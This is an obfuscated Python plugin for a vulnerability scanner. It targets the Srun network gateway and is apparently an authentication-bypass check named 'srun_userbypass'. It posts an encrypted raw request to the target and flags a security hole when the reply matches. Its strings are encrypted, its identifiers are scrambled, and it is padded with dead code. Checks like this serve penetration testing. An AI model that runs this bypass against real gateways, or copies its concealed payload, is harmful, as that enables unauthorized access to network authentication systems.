#Embedded file name: srun_userbypass.py
if 0:
    i11iIiiIii
import urlparse

def assign(service, arg):
    if service == '''srun_gateway''':
        OO0o = urlparse.urlparse(arg)
        return (True, decode('\x11#\xaf\x89\x8f\xb9uy\x84\xc4(7\xd2') % (OO0o.scheme, OO0o.netloc))
        if 0:
            Iii1I1 + OO0O0O % iiiii % ii1I - ooO0OO000o


def audit(arg):
    ii11i = decode("d\x1f\xc6\xf2\x80\xb3o-\xd8\x91h)\x8d{a\xf2\x95\xeb\xe4m\x87\xe8\x8f\xd0\xc7\xb3\xe1q\x922+\x9ed\x7f\xa4\x88\x91\x96N,\xcf\x80*'\xcc!&\xe3\xc4\xa6\xa0*\xd9\x8c\xf1\xd3\xc6\xa0\xedq\xc6W3\xafZ7\xe1\xce\x9a\xbc3q\xb6\xb7\x7fi\x89v\x7f\xb9\xd9\xdc\xe9t\x8d\xbc\x92\xdd\xd8\xa4\xe4v\xd1\x1b\x0b\xa3[>\xba\xde\x8d\xebq4\x91\x92\x7fu\x90>d\xbf\x98\xed\xfeg\x87\xe2\xd7\xd8\xa2\x97\xe7p\xd9\x13\x1a\xf0\x14\x00\xdd\xf6\xf3\xd9U\x10\xf5\xb0-a\x9cxt\xbe\x91\xfb\xe3m\x87\xe8\xb8\xb6\xdc\xa7\xb5s\xdd\x1d\x16\xa4\x123\xfd\xc3\xcb\xffi'\xd9\xc96r\x8evc\xa3\x95\xe5\xf59\x9b\xf3\xc2\xcc\xc7\xa6\xfc9\xc2\x1b\x0c\xb9C?\xe7\xc2\x9d\xfed0\xcc\x95ct\xf7\x19")
    oOooOoO0Oo0O, iI1, i1I11i, OoOoOO00, I11i = curl.curl2(arg + decode('\x1b9\xfb\xc2\xc5\xe4(3\xd4\x84/f\x9egx\xa2\x9a\xb5\xfck\x8f\xef\xdc'), raw=ii11i)
    if oOooOoO0Oo0O == 200 and i1I11i == decode('\x05`\xa4'):
        security_hole(decode('P5\xf3\xd3\xcc\xe8S0\xd9\x86\xff\xbbg`d\xbd\x84\xe7\xe2p\xc4\xd6\xd3\xcf\xdb;4\x85\xd0\x18\x0c\xbaU#\xe6'))


if __name__ == '__main__':
    from dummy import *

#KEY---345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca---